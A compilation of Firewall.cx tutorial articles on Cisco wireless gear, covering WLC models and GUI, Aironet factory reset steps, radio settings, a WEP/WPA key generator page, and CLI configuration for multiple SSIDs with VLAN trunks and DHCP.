This article introduced the Cisco Wireless LAN Controller interfaces. We covered the interfaces and ports found on WLCs, and analysed each interface's purpose, including Ethernet distribution ports, service port, redundancy port, interfaces such as the management interface, ap-manager interface, virtual interface and dynamic interfaces.



  • Hits: 181017

Introduction To Cisco Wireless Controllers (WLC) - Basic Concepts – WLC Models, Benefits & Their Friendly GUI Interface

The Cisco Wireless Controller (WLC) series devices provide a single solution to configure, manage and support corporate wireless networks, regardless of their size and locations. Cisco WLCs have become very popular during the last decade as companies move from standalone Access Point (AP) deployment designs to a centralized controller-based design, reaping the enhanced functionality and redundancy benefits that come with controller-based designs.

Cisco currently offers a number of different WLC models, each targeted for different sized networks. As expected, the larger models (WLC 8500, 7500, 5760 etc) offer more high-speed gigabit network interfaces, high availability and some advanced features required in large & complex networks, for example supporting more VLANs and WiFi networks, thousands of AP & Clients per WLC device and more.

Recently, Cisco has begun offering WLC services in higher-end Catalyst switches by embedding the WLC inside Catalyst switches e.g Catalyst 3850, but also as a virtual image 'Virtual WLC' that runs under VMware ESX/ESXi 4.x/5.x. Finally Cisco ISR G2 routers 2900 & 3900 series can accept Cisco UCS–E server modules, adding WLC functionality and  supporting up to 200 access points and 3000 clients.

cisco-wireless-controllers-introduction-basic-concepts-1Figure 1.  A few of the larger Cisco WLC models and Catalyst 3850

More detailed information on the current available models and their specifications can be obtained from our Cisco Wireless Controller Product and Datasheet section  and freely download WLC datasheets containing each model’s features, deployment modes, supported VLANs, maximum access points & clients, encryption features, wireless standards support (802.11xx) and many more.

Learn about WLC interfaces, their physical and logical ports, how they connect to the network and how Wireless SSIDs are mapped to VLAN interfaces, plus much more, in our Cisco WLC Interfaces, Ports & Their Functionality. Understand How WLCs Work, Connect to the Network Infrastructure & Wi-Fi SSID/VLAN mappings article.

Working With The Cisco WLC

While all WLC models support GUI and CLI based configuration, in contrast with Cisco routers and switches which are usually configured via CLI, WLCs are most often configured via their nicely designed web GUI.  The CLI is mandatory only during the initial configuration, where the engineer is required to assign an IP address to the WLC device, along with a few other important parameters.

Working with any WLC model gives the engineer a great advantage as the interface is identical across all WLC models, making it easy to manage and configure, regardless of the WLC model:

cisco-wireless-controllers-introduction-basic-concepts-2Figure 2.  Cisco WLC 8500 (left) and Cisco WLC 2500 (right) web interface

Unlike other Cisco products, the WLC’s GUI interface is extremely well designed with a logical layout.

When logging into the WLC GUI, the administrator is presented with a healthy amount of information, including a front view of the controller from where he can see the status of each physical port and more details which we’ll be looking into right now. 

Below is a screenshot of the WLC2504 homepage web interface:

cisco-wireless-controllers-introduction-basic-concepts-3 Figure 3.  Cisco 2504 WLC – Click to enlarge

The great part is that the homepage provides all necessary information an administrator would want to see during a routine check and that includes:

  • Visual state of the controller’s physical ports
  • Status of the controller's hardware (up time, IP address, CPU/Memory usage, temperature, firmware version etc)
  • Summary of Access Points connected and up/down radio interfaces
  • Current connected clients (on all wireless networks)
  • Top wireless networks and number of clients connected to each
  • Rogue Access Points and Clients detected
  • Recent traps generated by the controller

Obtaining more information on any section can be easily done by clicking on the Detail link next to it.  

The following screenshot shows the information presented by the controller when clicking on the Detail link under the Access Point Summary > All Access Points section:

cisco-wireless-controllers-introduction-basic-concepts-4 Figure 4.  Browsing through All APs currently registered – Click to enlarge

The information shown is extremely useful as it contains each access point's name, model, MAC address, Up time (extremely useful when troubleshooting client connection issues), access point admin state (enabled/disabled), firmware version and many more.

Equally useful information is provided when clicking on the Detail link of the Client Summary > Current Clients section:

cisco-wireless-controllers-introduction-basic-concepts-5 Figure 5.  Viewing currently connected clients – Click to enlarge

In this screen, the controller shows each client’s MAC address, the AP to which its connected, WLAN Profile used, WLAN SSID the client is connected to, protocol used (802.11a/b/g/n), status and much more. We would however like to have the option to also show the IP address of the wireless client on this page – for this information you currently need to click on its MAC address, after which a page loads the IP address of the client alongside with other information.

When necessary, the administrator can dive further and obtain more information on almost any aspect of the Wireless network, SSIDs, clients connected, client speeds etc – the list is endless!

Summary

This article introduced the Cisco Wireless LAN Controller (WLC). We explained the basic concepts behind the product, and talked about the different models available and their main features. We took a look at the intuitive GUI interface used to setup and monitor the controller and the whole wireless infrastructure.  More information on Cisco Wireless Controllers and wireless technology can be found in our Cisco Wireless Section. Users can also read about WLC interfaces-ports and their purpose, VLAN/SSID mappings and much more, in our next article: Cisco WLC Interfaces, Ports & Their Functionality. Understand How WLCs Work, Connect to the Network Infrastructure & Wi-Fi SSID/VLAN mappings.

 

  • Hits: 98570

Cisco Wireless Controllers (WLC) Datasheets Available for Download

downloads-wlc-datasheetsWe would like to inform our readers that Firewall.cx has just made available as a free download all of Cisco's Wireless Controller Datasheets.

The datasheets provide valuable infomation for all currently available Cisco Wireless Controllers including:

  • Scalability,
  • Performance speed
  • RF Management
  • QoS features
  • Supported Access Points models
  • Maximum Access Points & SSIDs
  • Supported Wireless Standard (802.11xx)
  • Physical interfaces
  • Redundancy options
  • Security standards
  • RFC compliance and support
  • Supported encryption methods
  • Authentication - Authorization & Accounting (AAA) support
  • Ordering information (product-id)
  • Optional accessories
  • License upgrade options their product-id

Read our article on Cisco Wireless Controllers - Basic concepts, models and benefits they provide to companies.

Readers can head directly to our Cisco Product Datasheets & Guides where they can find the Cisco Wireless Controllers (WLC) Datasheet section amongst other Cisco products.

  • Hits: 17340

Cisco Aironet 1100 & 1200 Series (1110, 1121, 1142, 1230, 1240, 1242AG) Factory Reset & Configuration Password Reset Procedure via CLI and Web GUI

Resetting a Cisco Aironet access point can be required if you’ve lost your password or need to wipe out the configuration of a previously configured access point. Cisco provides two main methods to perform a factory reset on the Aironet 1100 and 1200 series access points and these are: 1) Via the Mode Button 2) Via Web Interface

The first method (Mode Button) does not require any user credentials or passwords as the reset procedure is performed during the boot up process and does not involve logging into the access point.

The second method (Web Interface) requires username and password with privileged access 15 (administrator privileges) in order to perform the reset procedure.

Both reset procedures described below will reset all configuration settings to factory defaults. This means it will erase all passwords, SSIDs, WEP/WPA keys, IP address and anything else configured on the access point.

When the Cisco Aironet access point factory-reset procedure is complete, the default credentials will need to be used to access it. Both username and passwords are Cisco with a capital “C” (case-sensitive). In addition, the factory default IP address for the access point will be 10.0.0.1.

Factory Reset via MODE Button

This is the most common reset method engineers look for, and we’ve got it covered in four easy-to-follow steps!

Step 1
Disconnect power (the power jack for external power or the Ethernet cable for in-line power) from the access point.

Step 2

Press and hold the MODE button while you reconnect power to the access point.

Step 3

Hold the MODE button until the Status LED turns amber (approximately 1 to 2 seconds), and release the button.

Step 4

Reboot the access point by performing a power-cycle (switch off and then on) After the access point reboots, you must reconfigure the access point by using the Web-browser interface or the CLI.

CLI Output During Factory Reset via MODE Button

Below is the CLI output during the Mode button reset method.  It is clear that once the access point sees the MODE button pressed for 20 seconds (the time it takes until the status LED turns amber), it initiates the recovery process:

flashfs[0]: 147 files, 7 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 32385024
flashfs[0]: Bytes used: 5549056
flashfs[0]: Bytes available: 26835968
flashfs[0]: flashfs fsck took 20 seconds.
Reading cookie from system serial eeprom...Done
Base Ethernet MAC address: 1c:de:0f:94:b7:b8
Ethernet speed is 100 Mb - FULL duplex
button pressed for 20 seconds
process_config_recovery: set IP address and config to default 10.0.0.1
process_config_recovery: image recovery
image_recovery: Download default IOS tar image tftp://255.255.255.255/c1140-k9w7-tar.default
examining image...

Factory Reset via Web Interface (Recommended Option for Remote Reset)

Resetting your Cisco access point via its web interface is an easy process.  Following are the steps required:

Step 1
Open a web browser and enter the IP address of your Cisco access point

Step 2

Enter the necessary credentials (username & password)

Step 3

Once successfully logged in, you’ll be presented with Summary Status page:
cisco-wireless-1200-reset-1

Step 4
From the main menu, select System Software and then System Configuration sub-menu.  The access point will present a number of different management options.

Here we can select the Reset to Defaults to initiate the factory reset or alternatively the Reset to Defaults (Except IP) if we wish to reset to factory defaults but keep the current IP address.  The second option is especially handy in case you are required to perform this procedure remotely.

 This completes the Factory Reset procedure for all Cisco Aironet 1100 & 1200 series access points.



  • Hits: 103795

Understanding, Configuring & Tweaking Web-based Cisco Aironet Access Point. Network Interface Radio0 802.11a/b/g Settings

Cisco Aironet Access Points, just like most Cisco devices, provide a web interface from which we are able to configure the device. It is often we are presented with a number of options and settings, which we really are not sure why they exist, what they do, and how they can affect the performance of our wireless access point.  This is all about to change!

This article aims to help cover this gap by explaining the various configuration options and settings found in Cisco's Aironet series Web-Based configuration page.  While the web-based interface allows the configuration of many functions within the Aironet device, we will be focusing on the 'Network Interfaces: Radio0-802.11a/b/g' Settings, which is perhaps the most important section for the device's proper wireless operation.

Understanding and configuring correctly your Cisco Aironet Access Points can really make a difference in your clients wireless performance and connectivity range.  You'd be suprised on the performance difference of your wireless network, when tweaking your Cisco Aironet Access Points to adapt to the working environment.

This article explains all the network options found under the Cisco Aironet web-interface setup, in a step-by-step manner.  To help make it easier to track, we have broken the page into three sections, each containing a screenshot of the covered options.

Please note that some features and settings will not appear on your Cisco Aironet Access Point as they are supported only on specific models:

Cisco Aironet Network Interfaces: Radio0-802.11a/b/g Settings

cisco-wireless-ap-web-1

 

Enable Radio

If enabled, the access point sends packets through its 802.11a/b/g radio interface and monitors when other devices use the 802.11a/b/g radio interface to send packets. To change the administrative state of the radio from up to down, choose Disable. To change the administrative state of the radio from down to up, choose Enable.

Current Status (Software/Hardware)

  • Software - Indicates whether the interface has been enabled or disabled by the user.

  • Hardware - Indicates whether the line protocol for the interface is up or down.

Role in Radio Network

Select the role of the access point on your network. Choose one of the three access point (root) settings if the access point is connected to the wired LAN.

Access Point Root (Fallback to Radio Island): This default setting enables wireless clients to continue to associate even when there is no connection to the wired LAN.

Access Point Root (Fallback to Radio Shutdown): When the wired connection is lost, the radio shuts down. This fallback forces the clients to associate to another access point if one is available.

Access Point Root (Fallback to Repeater): When the wired connection is lost, the radio becomes a repeater. The repeater parent should be configured to allow data to be wirelessly transferred to another access point.

Repeater Non-Root: Choose this setting if the access point is not connected to the wired LAN. Client data is transferred to the access point selected as the repeater parent. The repeater parent may be configured as an access point or another repeater.

Fallback Mode Upon Loss of Ethernet Connection: Access points operate as root access points by default. When set to defaults, Cisco Aironet 1400 Series Wireless Bridges start up in install mode and adopt the root role if they do not associate to another bridge. If a 1400 series bridge associates to another bridge at start-up, it automatically adopts the non-root role. Cisco Aironet 1300 Series Wireless Bridges operate as root bridges by default.

Repeater: Specifies that the access point is configured for repeater operation. Repeater operation indicates the access point is not connected to a wired LAN and must associate to a root access point that is connected to the wired LAN.

Root: On access points, specifies that the access point is configured for root mode operation and connected to a wired LAN. This parameter also specifies that the access point should attempt to continue access point operation when the primary Ethernet interface is not functional.

Root Bridge: On 1300 series bridges, specifies that the bridge functions as a root access point. If the Ethernet interface is not functional, the unit attempts to continue access point operation. However, you can specify a fallback mode for the radio. This option is supported only on 1300 series bridges.

Non-root Bridge: On 1400 series bridges, specifies that the bridge operates as a non-root bridge and must associate to a root bridge. This option is supported only on 1400 series bridges.

Fallback Shutdown (Optional): Specifies that the access point should shutdown when the primary Ethernet interface is not functional. This option is supported only on access points and on 1300 series bridges in access point mode.

Fallback Repeater (Optional): Specifies that the access point should operate in repeater mode when the primary Ethernet interface is not functional. This option is supported only on access points and on 1300 series bridges in access point mode.

Install: On 1400 series bridges, configures the bridge for installation mode. In installation mode, the bridge flashes its LEDs to indicate received signal strength (RSSI) to assist in antenna alignment. This option is supported only on 1400 series bridges.

Workgroup-Bridge: On 1300 series bridges, specifies that the bridge operates in workgroup bridge mode. As a workgroup bridge, the device associates to an access point or bridge as a client and provides a wireless LAN connection for devices connected to its Ethernet port. This option is supported only on 1300 series bridges.

Universal Workgroup Bridge Mode: When configuring the universal workgroup bridge roll, you must include the client's MAC address. The workgroup bridge will associate with this MAC address only if it is present in the bridge table and is not a static entry. If validation fails, the workgroup bridge associates with its BVI's MAC address. In universal workgroup bridge mode, the workgroup bridge uses the Ethernet client's MAC address to associate with Cisco or non-Cisco root devices. The universal workgroup bridge is transparent and is not managed.

Scanner: This option is supported only when used with a WLSE device on your network. It specifies that the access point operates as a radio scanner only and does not accept associations from client devices. As a scanner, the access point collects radio data and sends it to the WDS access point on your network. This option is supported only on access points.

Data Rates

Use the data rates setting to choose the data transmission rates. The rates are expressed in megabits per second. The device always attempts to transmit at the highest rate selected. If there are obstacles or interference, the device steps down to the highest rate that enables data transmission.

Click the Best Range button to optimize access point range or the Best Throughput button to optimize throughput.

Note: When you configure the 802.11g access point radio for best throughput, the access point sets all 802.11g data rates to basic (required). This setting blocks association from 802.11b client devices.

For each of the rates, choose Require, Enable, or Disable.

  • Require - Enables transmission at this rate for all packets, both unicast and multicast. At least one data rate must be set to Require. A client must support a required rate before it can associate.

  • Enable - Enables transmission at this rate for unicast packets only.

  • Disable - Does not allow transmission at this rate.

Note: The client must support the basic rate you select or it cannot associate with the access point.

red-line

cisco-wireless-ap-web-2

Transmit Power: This setting determines the power level of the radio transmission. The default power setting is the highest transmit power allowed in your regulatory domain.

Note: Government regulations define the highest allowable power level for radio devices. This setting must conform to established standards for the country in which you use the device.

To reduce interference, limit the range of your access point, or to conserve power, select a lower power setting.

For an 802.11g radio, Transmit Power is divided into CCK Transmit Power and OFDM Transmit power. CCK is the modulation used in 802.11g for the lower frequency rates, and OFDM is the modulation used in 802.11g for higher data rates (above 20 Mbps).

Note: The 100 mW (20dBM) value is not available for rates greater than 12 Mbps.

Power Translation Table (mW/dBm)

The power settings may be in mW or in dBm depending on the particular radio that is being configured. This table translates between mW and dBm.

Limit Client Power (mw): Determine the maximum power level allowed on client devices that associate to the access point. When a client device associates to the access point, the access point sends the maximum power level setting to the client.

Note: The 100 mW value is not available for rates greater than 12 Mbps.

Default Radio Channel: The available selection of radio channels is determined by your regulatory domain. The default setting is the least-congested frequency. With this setting, the device scans for the radio channel that is least busy and selects that channel for use. The device scans at power-up and when the radio settings are changed. You can also select specific channel settings from the Default Radio Channel drop-down menu.

Short Slot Time (for 802.11g radios only): Determine if you want to enable support for the Extended-Rate-PHY short slot time. Enabling this setting reduces the slot time from the standard 20 microseconds to 9 microseconds to increase throughput.

Least Congested Channel Search: This selection list is available only when Default Radio Channel is set to Least Congested Frequency. You can search for least congested channels but exclude some channel(s) which are known to be problematic or already in use by other applications. By default, all channels are selected and searched. To select more than one channel, hold down the Ctrl or Shift keys to highlight multiple channels.

World Mode Multi-Domain Operation (for 802.11b and 802.11g only): World mode operation is disabled by default. If you uncheck Disable, the device adds channel carrier set information to its beacon. Client devices with world-mode enabled receive the carrier set information and adjust their settings automatically. If you select the dot11d option, you must enter an ISO country code. If you select the legacy option, you enable Cisco legacy world mode.

With world mode enabled, the access point advertises the local settings, such as allowed frequencies and transmitter power levels. Clients with this capability then passively detect and adopt the advertised world settings, and then actively scan for the best access point.

Country Code (required only for dot11d option): A country code can be selected only if the dot11d option was chosen in the World Mode option above. Use the drop-down menu to select the appropriate country. After the country code, you must enter indoor or outdoor to indicate the placement of the access point.

Radio Preamble (802.11b and 802.11g only): The radio preamble is a section of data at the head of a packet that contains information the access point and the client devices need when sending and receiving packets. Keep the setting on short unless you want to test with long preambles. If you have the radio preamble set to short and a client associates that does not support short preamble associates, the access point will send only long preamble packets to this client.

  • Short - A short preamble improves throughput performance. Cisco Aironet's Wireless LAN Adapter supports short preambles. The access point and client negotiate the use of the short preamble. Early models of Cisco Aironet's Wireless LAN Adapter require long preambles.

  • Long - A long preamble ensures compatibility between the access point and all early models of Cisco Aironet Wireless LAN Adapters.

Receive Antenna and  Transmit Antenna:

  • Diversity - This default setting tells the device to use the antenna that receives the best signal. If your device has two fixed (non-removable) antennas, you should use this setting for both receive and transmit.

  • Left (secondary)- If your device has removable antennas and you install a high-gain antenna on the left connector, you should use this setting for both receive and transmit. When you look at the back panel, the left antenna is on the left.

  • Right (primary)- If your device has removable antennas and you install a high-gain antenna on the right connector, you should use this setting for both receive and transmit. When you look at the back panel, the right antenna is on the right.

Note: The device receives and transmits using only one antenna at a time, so you cannot increase range by installing high-gain antennas on both connectors and pointing one north and one south. When the device uses the north-pointing antenna, client devices to the south should be ignored by the access point.

External Antenna Configuration: This feature is currently not operational, but it may be supported in future releases.

Antenna Gain(dB): The gain of an antenna is a measure of the antenna's ability to direct or focus radio energy over a region of space. High-gain antennas have a more focused radiation pattern in a specific direction. This setting is disabled on the bridge.

Aironet Extensions: Select Enable to use Cisco Aironet 802.11 extensions. This setting must be set to Enable so that you can use load balancing, MIC, and TKIP.

Ethernet Encapsulation Transform: Choose 802.1h or RFC1042to set Ethernet encapsulation type. Data packets that are not 802.2 packets must be formatted to 802.2 with 802.1h or RFC1042. Cisco Aironet equipment defaults to RFC1042 because it provides optimum interoperability.

  • 802.1h - This setting provides optimum performance for Cisco Aironet wireless products.

  • RFC1042 - Use this setting to ensure interoperability with non-Cisco Aironet wireless equipment. RFC1042 does not provide the interoperability advantages of 802.1h but is used by other manufacturers of wireless equipment.

Reliable Multicast to WGB: Normally, an access point treats a workgroup bridge as an infrastructure device and not as a client. The access point uses the reliable multicast protocol to ensure delivery of all multicast packets. The extra traffic caused by reliable delivery limits the number of workgroup bridges that can be associated. Select Disableto allow the workgroup bridge to be treated as a non-infrastructure device and thus allow the maximum number of workgroup bridges to be associated.

Public Secure Packet Forwarding: Public Secure Packet Forwarding (PSPF) prevents client devices associated to an access point from inadvertently sharing files or communicating with other client devices associated to the access point. It provides Internet access to client devices without providing other capabilities of a LAN.

No exchange of unicast, broadcast, or multicast traffic occurs between protected ports. Choose Enable so that the protected port can be used for secure mode configuration.

PSPF must be set per VLAN.

Note: To prevent communication between clients associated to different access points on your wireless LAN, you must set up protected ports on the switch to which your access points are connected.

red-line
cisco-wireless-ap-web-3

Short Slot Time: You can increase throughput on the 802.11g radio by enabling short slot time. Reducing the slot time from the standard 20 microseconds to the 9-microsecond short slot time decreases the overall backoff time, which increases throughput. Backoff time, which is a multiple of the slot time, is the random length of time that a station waits before sending a packet on the LAN.

When you enable short slot time, the access point/bridge uses the short slot time only when all clients associated to the 802.11g radio support short slot time. Short slot time is disabled by default.

Beacon Privacy Guest-Mode: This command must be configured if you wish the beacon frames to use the privacy settings of the guest-mode SSID. If there is no guest-mode SSID configured, the command has no effect. If there is a guest-mode SSID and the command is configured, the privacy bit present in the beacon frames are set to ON/OFF according to how the security (encryption) settings of the guest-mode SSID are configured.

The command has no effect in MBSSID mode.

Beacon Period: The beacon period is the amount of time between access point/bridge beacons in kilomicroseconds. One Kusec equals 1,024 microseconds. The default beacon period is 100

Data Beacon Rate (DTIM): This setting, always a multiple of the beacon period, determines how often the beacon contains a delivery traffic indication message (DTIM). A traffic indication map is present in every beacon. The DTIM notifies power-save client devices that a packet is waiting for them. If power save clients are active, the access point buffers any multicast traffics and delivers them immediately after the DTIM beacon. Power save nodes always wake for the DTIM beacons. The longer the time, the more buffering the access point does, and the longer the multicasts are delayed.

If the beacon period is set at 100 (its default setting), and the data beacon rate is set at 2 (its default setting), then the device sends a beacon containing a DTIM every 200 Kusec. One Kusec equals 1,024 microseconds.

Max. Data Retries: The maximum number of attempts the device makes to send a packet before giving up, dropping the packet, and disassociating the client.

RTS Max. Retries: The maximum number of times the device issues an RTS before stopping the attempt to send the packet through the radio. Enter a value from 1 to 128.

Fragmentation Threshold: This setting determines the size at which packets are fragmented (sent as several pieces instead of as one block). Use a low setting in areas where communication is poor or where there is a great deal of radio interference.

RTS Threshold: This setting determines the packet size at which the device issues a request to send (RTS) before sending the packet. A low RTS Threshold setting can be useful in areas where many client devices are associating with the access point or in areas where the clients are far apart and can detect only the access point and not each other.

Repeater Parent AP Timeout: If this timeout is enabled, the access point in repeater mode looks only for the parent access point specified in the following Repeater Parent AP MAC definition for this given amount of time. If the timeout expires, the list is ignored, and the unit associates to an access point that matches its requirements, regardless of its MAC address. If the timeout is disabled, the repeater associates only to parents in the list and continues the search.

Repeater Parent AP MAC 1-4: Normally, a repeater access point (without a wired LAN connection) associates much like a normal client, choosing the best access point it can find. Enter MAC addresses in this list if you want to control the parent access point to which a repeater may associate. If MAC addresses are entered in this list, a repeater associates only to a parent whose MAC address matches an entry in the list. If the first MAC address is not available, the access point continues through the list and waits the amount of time specified in Repeater Parent AP Timeout field before trying the next.

  • Hits: 64699

Wireless (Wifi) WEP WPA WPA2 Key Generator

The Firewall.cx Wireless LAN Key Generator will allow the generation of a WEP or WPA ASCII based encryption key and will provide the equivalent HEX or ASCII string so it can be inserted directly into a Cisco Access Point configuration.

As many engineers know, it is a common problem that when configuring a WEP encryption key in a Cisco Access Point, the IOS will not allow the input of the actual ASCII key, but instead requires the HEX equivalent. With our WLAN Key generator, simply insert your desired pass phrase and it will generate the necessary HEX value encryption key that needs to be used in the CLI or Web-Based configuration of the Cisco Access Point.

The Wireless LAN Key Generator allows for quick and valid WEP/WPA key generation.

You can use the Random WEP/WPA Key Generator to generate a random WEP or WPA key. Simply choose the desired key length using the drop-down menu, and one will be generated for you.

The WEP/WPA Key Generator supports 64bit, 128bit, 152bit & 256bit WEP keys, and 160bit, 504bit WPA/WPA2 keys for maximum security.

Alternatively, if you require to generate a key based on a custom passphrase (most cases), you can use the Custom WEP/WPA Key Generator. Just enter your password phrase into the Custom WEP/WPA Key Generator - ASCII text fields, and its HEX equivalent will be generated automatically. You can also insert the HEX Value and the system will reveal the actual ASCII value - handy if you want to discover what password phrase has been used for the encryption.


Netflow Analyzer

WEP/WPA Key Generator
Random WEP/WPA Key Generator
Key Length:
ASCII :
HEX :
Custom WEP/WPA Key Generator
Note: use 5/13/16/29 characters for 64/128/152/256-bit WEP Encryption
ASCII : #
HEX :

Calculate Key Now!        Clear Form

Notes: WEP encryption uses 24 bit "Initilization Vector" in addition to the "secret key". Therefore, 40 bit WEP can be refered to as 64 bit WEP, and 104 bit can be refered to as 128 bit, depending on whether the "initialization vector" is counted or not.


  • Hits: 451715

Cisco Aironet 1242AG /1240 - Multiple SSID & 802.1q Trunk VLAN Link Configuration

This article explains how the Cisco 1240 series access point can be setup to provide support for multiple SSID, each SSID assigned to a separate VLAN.  This type of configuration is ideal for supporting different wireless networks, each one with its own characteristics.

Frequently used setup of Cisco access points involve at least one wireless network (SSID) for  accessing the local network (VLAN1) and another SSID for Internet access (Guest VLAN).

It is important to note that this guide is also valid for the following Cisco Access Points: Cisco Aironet 1240 Series, Cisco Aironet 1040 series, Cisco Aironet 1130 AG Series, Cisco Aironet 1140 Series, Cisco Aironet 1200 Series, Cisco Aironet 1250 Series and Cisco Aironet 1260 Series.  Configuration of multiple SSIDs with Trunk links is almost identical, with minor differences in the interfaces (where we have more than one radio) and channels, depending if there is support for 802.11a/b/g/n.
Cisco 1242AG Multiple SSID VLAN Trunk Link

Cisco Access Point Multiple SSID Configuration 

Configuring multiple SSIDs on a Cisco access point is a straight-forward process, however it does contain a few details we will analyse as we progress.

We need to now create the two SSIDs by defining their name, which will be broadcasted so users can find them, encryption method plus keys and VLAN assignment.

AP (config)# dot11 ssid Company
AP (config-ssid)# vlan 1
AP (config-ssid)# authentication open
AP (config-ssid)# authentication key-management wpa
AP (config-ssid)# guest-mode
AP (config-ssid)# mbssid guest-mode
AP (config-ssid)# infrastructure-ssid optional
AP (config-ssid)# wpa-psk ascii 0 firewall.cx
AP (config-ssid)# exit
AP (config)# dot11 ssid Hotspot
AP (config-ssid)# vlan 2
AP (config-ssid)# authentication open
AP (config-ssid)# authentication key-management wpa
AP (config-ssid)# mbssid guest-mode
AP (config-ssid)# wpa-psk ascii 0 free-access
AP (config-ssid)# exit
AP (config)# dot11 vlan-name vlan1 vlan1
AP (config)# dot11 vlan-name vlan2 vlan2

The above configuration is quite different from setups with one SSID. Reason being the multiple SSID and VLAN configuration required to ensure each SSID is assigned to the correct vlan. The 'Company' wireless network is assigned to VLAN 1 and the 'Hotspot' wireless network to VLAN 2.

Notice that when using multiple SSIDs on a Cisco aironet access point, it is imperative to use the mbssid guest-mode command otherwise the SSID name of the wireless network will not be broadcasted correctly.

The 'dot11 <vlan-name>'  command ensures the correct mapping of vlans and their respective VLAN names. In our example, the VLAN names follow the actual VLANs. So, VLAN 1 has been named 'vlan1'. This helps keep track of them.

Next, we must ensure the integrated routing and bridging (IRB) feature is enabled to allow the routing of our protocols (IP) between routed interfaces and bridge groups. This command is most likely already present in the configuration, but let's play safe and enter it:

AP (config)# bridge irb

Configuring The Dot11Radio0 Interface

Configuring the Dot11Radio0 interface is our next step. Dot11Radio0 is the actual radio interface of the integrated Cisco access point.  We will need to assign the SSIDs configured previously to this interface, along with the encryption methods and a few more parameters.

AP (config)# interface Dot11Radio0
AP (config-if)# encryption vlan1 mode ciphers tkip
AP (config-if)# encryption vlan2 mode ciphers tkip
AP (config-if)# ssid Company
AP (config-if)# ssid Hotspot
AP (config-if)# mbssid
AP (config-if)# station-role root
AP (config-if)# speed  basic-1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 24.0 36.0 48.0 54.0
AP (config-if)# channel 2462

Most commands are self-explanatory. We will however explain the basic and important ones:

The Encryption VLAN commands set the encryption mode for each VLAN and, therefore, each SSID.  

The SSID command assigns the SSIDs to this interface.

The mbssid command ensures both SSIDs are broadcast and are viewable to our wireless clients.

The station-role root is a default command and makes the access point act as a root station, in other words as an autonomous access point.

Note the speed basic command. This as well is a default command that sets the supported speeds. The first portion, 1.0 to 54.0 refers to the 802.11 b/g protocol. If you have a dual radio on your access point you can configure the Dot11Radio1 (Second radio) interface accordingly.

Configuring The Dot11Radio0 Sub-interfaces

At this point we are required to configure sub-interfaces on Dot11Radio0, assigning each sub-interface to a VLAN.

AP (config)# interface Dot11Radio0.1
AP (config-subif)# encapsulation dot1Q 1 native
AP (config-subif)# no ip route-cache
AP (config-subif)# bridge-group 1
AP (config-subif)# bridge-group 1 subscriber-loop-control
AP (config-subif)# bridge-group 1 block-unknown-source
AP (config-subif)# no bridge-group 1 source-learning
AP (config-subif)# no bridge-group 1 unicast-flooding
AP (config-subif)# bridge-group 1 spanning-disabled
AP (config)# exit
AP (config)# interface Dot11Radio0.2
AP (config-subif)# encapsulation dot1Q 2
AP (config-subif)# no ip route-cache
AP (config-subif)# bridge-group 2
AP (config-subif)# bridge-group 2 block-unknown-source
AP (config-subif)# no bridge-group 2 source-learning
AP (config-subif)# no bridge-group 2 unicast-flooding
AP (config-subif)# bridge-group 2 spanning-disabled

When creating the subinterfaces, we always use easy-to-identify methods of mapping. Thus, interface Dot11Radio0.1 means this interface will be mapped to VLAN 1, while interface Dot11Radio0.2 will map to VLAN 2.

The encapsulation dot1Q 1 native command surves two purposes. It maps VLAN 1 to sub-interface Dot11Radio0.1 and tells the ap that this VLAN (1) is the native vlan.  This means that untagged VLAN traffic belongs to VLAN 1.  More information on VLAN is available in our VLAN Section - be sure to visit it.

Similarly, under interface Dot11Radio0.2,  the encapsulation dotQ 2 command maps VLAN 2 traffic to this sub-interface.

The bridge-group command assigns each sub-interface to a bridge group. Each sub-interface is assigned to its own bridge-group. The bridge group essentially connects the wireless sub-interfaces with the Fast Ethernet interface this access point has. This is analysed below.

Configuring Cisco 1242AG / 1240 Access Point Fast Ethernet0, Sub-Interfaces & BVI interface

As with all Cisco Aironet access points, you'll find a Fast Ethernet0 interface that is used to connect the access point to our LAN switch. On Cisco Aironet models that support 802.11n technology e.g Cisco Aironet 1140, this interface is replaced with a Gigabit Ethernet interace, desinged to handle the increased capacity and throughput of the access point.

Following is the configuration required to create the necessary GigabitEthernet sub-interfaces and map the Dot11Radio0.X interfaces previously created, with them:

AP (config)# interface FastEthernet0
AP (config-if)# no ip address
AP (config-if)# no ip route-cache
AP (config-if)# exit

AP (config)# interface FastEthernet0.1
AP (config-if)#  encapsulation dot1Q 1 native
AP (config-if)#  no ip route-cache
AP (config-if)#  bridge-group 1
AP (config-if)#  no bridge-group 1 source-learning
AP (config-if)#  bridge-group 1 spanning-disabled
AP (config-if)# exit

AP (config)# interface FastEthernet0.2
AP (config-if)# encapsulation dot1Q 2
AP (config-if)# no ip route-cache
AP (config-if)# bridge-group 2
AP (config-if)# no bridge-group 2 source-learning
AP (config-if)# bridge-group 2 spanning-disabled
AP (config-if)# exit

AP (config)# interface BVI1
AP (config-if)# ip address 192.168.30.5 255.255.255.0
AP (config-if)# no ip route-cache

The FastEthernet interface and sub-interface configuration follows the same logic as the Dot11Radio0 interface. Notice that each FastEthernet sub-interface is mapped to the same VLAN and bridge-group as the Dot11Radio0 sub-interfaces.  

Next, we create the one and only BVI1 interface and assign it an IP Address. This is basically the IP Address of our access point and is reachable from our LAN network, so it's best to assign it an IP Address from your LAN network (VLAN 1).

It is important to note that only one bridge-interface (BVI Interface) is configured with an IP Address. The rest of the bridge groups are not required to have a BVI interface as all traffic is trunked through the BVI1 Interface. This is per Cisco design.

Finally, we must enable ip routing for bridge 1:

AP (config)# bridge 1 protocol ieee
AP (config)# bridge 1 route ip

Configuring DHCP Service For Both VLAN Interfaces

First step is to define the DHCP service and ip address pools for our two Vlans, and therefore SSID's.

If you prefer to configure the DHCP service on your Cisco router, detailed instructionscan be found at our Cisco Router DHCP Server Configuration article.

To help make it easy, we are providing the necessary commands for our example:

AP(config)# ip dhcp excluded-address 192.168.30.1 192.168.30.20
AP(config)# ip dhcp excluded-address 192.168.40.1 192.168.40.20

AP(config)# ip dhcp pool Company
AP(dhcp-config)# network 192.168.30.0 255.255.255.0
AP(dhcp-config)# dns-server 192.168.30.1
AP(dhcp-config)# default-router 192.168.30.1

AP(config)# ip dhcp pool Hotspot
AP(dhcp-config)# network 192.168.40.0 255.255.255.0
AP(dhcp-config)# default-router 192.168.40.1
AP(dhcp-config)# dns-server 192.168.40.1

This configuration assumes that your router has two VLAN interfaces configured with the appropriate Internet access and Firewall configuration.

